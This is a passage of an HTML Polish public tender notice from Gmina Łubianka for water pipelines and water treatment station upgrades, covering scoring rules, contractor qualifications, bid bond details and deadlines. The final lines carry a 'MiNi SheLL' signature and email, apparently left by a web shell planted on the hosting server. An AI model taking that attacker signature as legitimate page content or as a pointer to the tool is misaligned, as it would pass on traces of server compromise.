kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4: Budowa przewodów wodociągowych spinających gminną sieć wodociągową<br/>Zakres prac obejmuje budowę sieci wodociągowej z rur PCV o średnicy fi 110 o łącznej długości 4.670 mb, tj. m.in.:<br/>• w obrębie Łubianka, w obrębie Biskupice – rys nr 1.1 oraz rys. 1.2<br/>PVC Ø 110mm L = 2020,0m<br/>PVC Ø 40 mm L = 7,3m<br/>- R. O. PE Ø 110 L=4,5m<br/>- R.O. PE Ø200 L= 5+6+4,7+5+8+15= 43,7m<br/>- hydrant ppoż. DN 80<br/>• w obrębie Bierzgłowo – rys. nr 2<br/>- PVC Ø 110 L = 837,0m<br/>• w obrębie Łubianka: - rys. nr 4<br/>- PVC Ø110 L = 522,6 m<br/>- R.O. PE Ø 200 = 8,5+9+22 = 39,5m<br/>• w obrębie Pigża - rys. nr 5<br/>- PVC Ø 110 L = 529,2 m<br/>- R.O. PE Ø 200 L= 3,5+8,5 = 12m<br/>• w obrębie Przeczno: rys. nr 6<br/>- PVC Ø110 L = 333,7m<br/>- R.O. PEØ200 L = 18m<br/>• w obrębie Biskupice: w obrębie Wymysłowo - rys. nr 7<br/>- PVCØ 110 L= 428,1 m<br/>- R.O. PEØ200 L = 10+19,5 = 29,5m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-08-01 do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu przy wyborze oferty najkorzystniejszej Zamawiający, zastosuje następujące kryteria oceny ofert:<br/>1) Cena (C) – Waga 60 pkt.,<br/>2) Gwarancja (G) – Waga 40 pkt.<br/>2. Zamawiający dokona oceny ofert, zgodnie z następującymi zasadami, przyjmując, że 1%=1pkt.:<br/>1) Kryterium „Cena” (C)<br/>W tym kryterium punkty zostaną przyznane na podstawie podanej przez wykonawcę w ofercie ceny brutto wykonania przedmiotu zamówienia. Ocena punktowa w ramach kryterium ceny zostanie dokonana zgodnie z poniższym wzorem:<br/>C=Cmin/Cbad × 100pkt × 60% <br/>Gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium „cena” <br/>Cmin – najniższa cena całkowita spośród badanych ofert<br/>Cbad – cena całkowita oferty badanej<br/>2) Kryterium „Gwarancja” (G)<br/>W ramach niniejszego kryterium oferty zostaną ocenione w stosunku do wskazanego przez Wykonawcę w formularzu oferty okresu gwarancji na przedmiot zamówienia. Punkty zostaną przyznane według informacji wskazanych w poniżej:<br/>Okres gwarancji liczony od dnia podpisania protokołu końcowego bez zastrzeżeń Liczba punktów<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 20 pkt<br/>60 miesięcy - 40 pkt<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania niniejszej SWZ oraz otrzyma największą ilość punktów po zsumowaniu liczby punktów uzyskanych w określonych kryteriach, przy zastosowaniu wzoru:<br/>P=C+G<br/>Gdzie:<br/>P - całkowita liczba punktów przyznana ofercie<br/>C - liczba punktów przyznanych ofercie w kryterium „cena”<br/>G - liczba punktów przyznanych ofercie w kryterium „gwarancja”<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5: Rozbudowa stacji uzdatniania wody w miejscowości Przeczno, Warszewice oraz Zamek Bierzgłowski<br/>Zakres prac obejmuje m.in.:<br/><br/>1) SUW Przeczno:<br/>• ułożenie przewodu tłocznego PE 110 mm od studni głębinowej do budynku SUW i wykonanie włączenia go do istniejącego rurociągu w budynku stacji zgodnie z rys. nr 09.<br/>• ułożenie kabla YKY 5*16 mm2 zasilającego pompę głębinową, na odcinku od studni do budynku SUW.<br/>• ułożenie 2 szt. kabli sterowniczych (światłowód) DARKA A-DQ(ZN)B2Y na odcinku od studni do rozdzielni w stacji SUW. Kable muszą być zakończone po obu stronach mufą światłowodową.<br/>• wykonanie ogrodzenia studni nr 2.<br/>• utwardzenie terenu studni kostką betonową.<br/>• wykonanie oświetlenia zewnętrznego studni.<br/>• wykonanie drogi dojazdowej do studni o nawierzchni z gruzu betonowego.<br/>• wykonanie fundamentu pod zbiornik retencyjny uzdatnionej wody.<br/>• montaż zbiornika retencyjnego wody uzdatnionej stalowego pionowego o poj. 150 m3 wraz z włączeniem go do istniejącego systemu technologicznego stacji zgodnie z PZT.<br/><br/>2) SUW Zamek Bierzgłowski:<br/>• ułożenie przewodu tłocznego PE 110 mm od studni głębinowej nr 3 i 4 do budynku SUW i wykonanie włączenie ich do ciągu technologicznego w budynku stacji.<br/>• ułożenie kabla YKY 5*16 mm2 zasilającego pompy głębinowe, na odcinku od studni do budynku SUW.<br/>• ułożenie 2 szt. kabli sterowniczych do każdej studni(światłowód) DARKA A-DQ(ZN)B2Y na odcinku od studni do rozdzielni w stacji SUW. Kable muszą być zakończone po obu stronach mufą światłowodową.<br/>• wykonanie fundamentu pod zbiornik retencyjny uzdatnionej wody.<br/>• montaż zbiornika retencyjnego wody uzdatnionej stalowego pionowego o poj. 100 m3 wraz z włączeniem go do istniejącego systemu technologicznego stacji zgodnie z PZT.<br/>• utwardzenie terenu studni i stacji kostką betonową zgodnie z PZT.<br/>• ogrodzenie terenu studni i stacji zgodnie z PZT.<br/>• wykonanie oświetlenia zewnętrznego studni.<br/>• wymiana przepustnic ręcznych przy filtrach na przepustnice pneumatyczne.<br/>• montaż szafy pneumatycznej.<br/>• montaż lampy UV.<br/>• montaż przepływomierzy do zdalnego odczytu.<br/>• montaż szafy technologicznej.<br/>• zainstalowanie programu SKADA.<br/><br/>3) SUW Warszewice:<br/>• wykonanie żelbetonowego zbiornika retencyjnego wody uzdatnionej o poj. 400 m3<br/>• wykonanie odstojnika wód popłucznych z PE-HD<br/>• wykonanie przepompowni wód nadosadowych.<br/>• przeprowadzenie robót budowlano-remontowych budynku stacji<br/>• montaż dodatkowego filtra odżelaziające oraz dodatkowych aeratorów<br/>• montaż zestawów pompowych II i III stopnia<br/>• montaż lampy UV<br/>• montaż osuszaczy<br/>• wymiana złoża filtracyjnego w istniejących odżelażaczach<br/>• zainstalowanie programu SKADA.<br/>• budowa sieci wodociągowej PE110mm a odcinku 353 mb od studni nr 7 do budynku SUW<br/>• wykonanie linii zasilającej i sterującej od studni do stacji <br/>• włączenie studni w układ technologiczny stacji, umożliwiający pracę studni w systemie automatycznym i ręcznym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45252120-5 - Roboty budowlane w zakresie zakładów uzdatniania wody</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu przy wyborze oferty najkorzystniejszej Zamawiający, zastosuje następujące kryteria oceny ofert:<br/>1) Cena (C) – Waga 60 pkt.,<br/>2) Gwarancja (G) – Waga 40 pkt.<br/>2. Zamawiający dokona oceny ofert, zgodnie z następującymi zasadami, przyjmując, że 1%=1pkt.:<br/>1) Kryterium „Cena” (C)<br/>W tym kryterium punkty zostaną przyznane na podstawie podanej przez wykonawcę w ofercie ceny brutto wykonania przedmiotu zamówienia. Ocena punktowa w ramach kryterium ceny zostanie dokonana zgodnie z poniższym wzorem:<br/>C=Cmin/Cbad × 100pkt × 60% <br/>Gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium „cena” <br/>Cmin – najniższa cena całkowita spośród badanych ofert<br/>Cbad – cena całkowita oferty badanej<br/>2) Kryterium „Gwarancja” (G)<br/>W ramach niniejszego kryterium oferty zostaną ocenione w stosunku do wskazanego przez Wykonawcę w formularzu oferty okresu gwarancji na przedmiot zamówienia. Punkty zostaną przyznane według informacji wskazanych w poniżej:<br/>Okres gwarancji liczony od dnia podpisania protokołu końcowego bez zastrzeżeń Liczba punktów<br/>36 miesięcy - 0 pkt<br/>48 miesięcy - 20 pkt<br/>60 miesięcy - 40 pkt<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania niniejszej SWZ oraz otrzyma największą ilość punktów po zsumowaniu liczby punktów uzyskanych w określonych kryteriach, przy zastosowaniu wzoru:<br/>P=C+G<br/>Gdzie:<br/>P - całkowita liczba punktów przyznana ofercie<br/>C - liczba punktów przyznanych ofercie w kryterium „cena”<br/>G - liczba punktów przyznanych ofercie w kryterium „gwarancja”<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla Części 2:<br/>• wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy skierują do jego realizacji: kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń, który spełni wymagania o których mowa w art. 37c ustawy o ochronie zabytków i opiece nad zabytkami.<br/><br/>Dla Części 3:<br/>• przedstawi wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Wymagane jest należyte wykonanie przynajmniej jednego zamówienia w ramach jednej umowy polegające na budowie lub przebudowę mostu lub wiaduktu o wartości zamówienia co najmniej 600 000,00 zł brutto.<br/>• wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami: o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy skierują do jego realizacji: kierownika budowy posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej bez ograniczeń.<br/><br/>Dla Części 5:<br/>• przedstawi wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>Wymagane jest należyte wykonanie przynajmniej jednego zamówienia w ramach jednej umowy polegające na budowie, przebudowie, rozbudowie, modernizacji stacji uzdatniania wody o wartości co najmniej 2 000 000,00 zł brutto.<br/>• wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - udzielenie zamówienia mogą ubiegać się wykonawcy, którzy skierują do jego realizacji: <br/>1) kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń,<br/>2) kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>3) kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Dotyczy wyłącznie Części 5 postępowania: oferta winna być zabezpieczona wadium w wysokości: 120 000,00 zł (słownie: sto dwadzieścia tysięcy złotych i 00/100)<br/>2. Wadium może być wniesione w jednej lub w kilku z następujących form:<br/>1) w pieniądzu, na następujący rachunek bankowy Zamawiającego:<br/>Nicolaus Bank Spółdzielczy w Toruniu Oddział Łubianka<br/>22 9511 0000 2003 0021 4902 0006<br/>z podaniem tytułu przelewu:<br/>„Wadium SZP.271.1.2025 – Część 5”<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 z późn. zm.).<br/>3. W przypadku wadium wnoszonego w pieniądzu, za datę jego wniesienia uważa się datę jego uznania na koncie bankowym Zamawiającego. Wadium powinno wpłynąć na rachunek bankowy Zamawiającego do upływu terminu wyznaczonego na składanie ofert, tj. przed upływem dnia i godziny wskazanej w Rozdziale 21 ust. 2 SWZ.<br/>4. Wadium bez względu na formę w jakiej zostało wniesione, musi obejmować cały okres związania ofertą, który został wskazany w Rozdziale 19 ust. 1 SWZ.<br/>5. Zamawiający wymaga, aby w przypadku wniesienia wadium w formie:<br/>1) pieniężnej – dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;<br/>2) gwarancji lub poręczenia – Wykonawca złożył wraz z ofertą oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6. Z treści gwarancji lub poręczenia powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie do wypłaty Zamawiającemu pełnej kwoty wadium w przypadku wystąpienia okoliczności, o których mowa w art. 98 ustawy Pzp.<br/>7. Okoliczności oraz zasady zwrotu wadium, jego zatrzymania lub zabezpieczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają możliwość wprowadzania zmiany Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 3 ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 3 ust. 1, może nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących Przedmiot Umowy lub wydania zakazu prowadzenia robót budowlanych, stanowiących Przedmiot Umowy przez organ administracji publicznej, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenie robót budowlanych,<br/>[...] Dalsze informacje w Załączniku nr 6A-E SWZ - ISTOTNE POSTANOWIENIA UMOWY (projekt umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-14 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gmina_lubianka, w myśl Ustawy PZP na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-14 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com